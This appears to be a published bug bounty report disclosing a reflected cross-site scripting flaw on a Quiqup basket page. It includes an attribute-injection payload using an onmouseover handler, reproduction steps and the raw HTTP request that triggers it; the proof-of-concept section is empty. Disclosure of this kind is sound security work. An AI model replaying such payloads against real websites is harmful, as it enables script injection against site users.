Reflected XSS on Quiqup.com

  • Reported to Quiqup
  • Reported by Haqtify
  • Low (2.2)
  • $100
  • Published 3 years ago
  • No Likes

URL:

https://gifts.quiqup.com/basket/

Description:

Cross-Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into otherwise benign and trusted web sites. XSS attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a different end user. Flaws that allow these attacks to succeed are quite widespread and occur anywhere a web application uses input from a user within the output it generates without validating or encoding it.

Payload:

“onmouseover=’alert(1)’bad=”

Steps To Reproduce:

1. Goto this URL.

https://gifts.quiqup.com/basket/

2.Intercept the request and insert XSS Payload after URL.

3. XSS Executed.

REQUEST :

GET /basket//”onmouseover=’alert(1)’bad=” HTTP/1.1
Host: gifts.quiqup.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0

POC: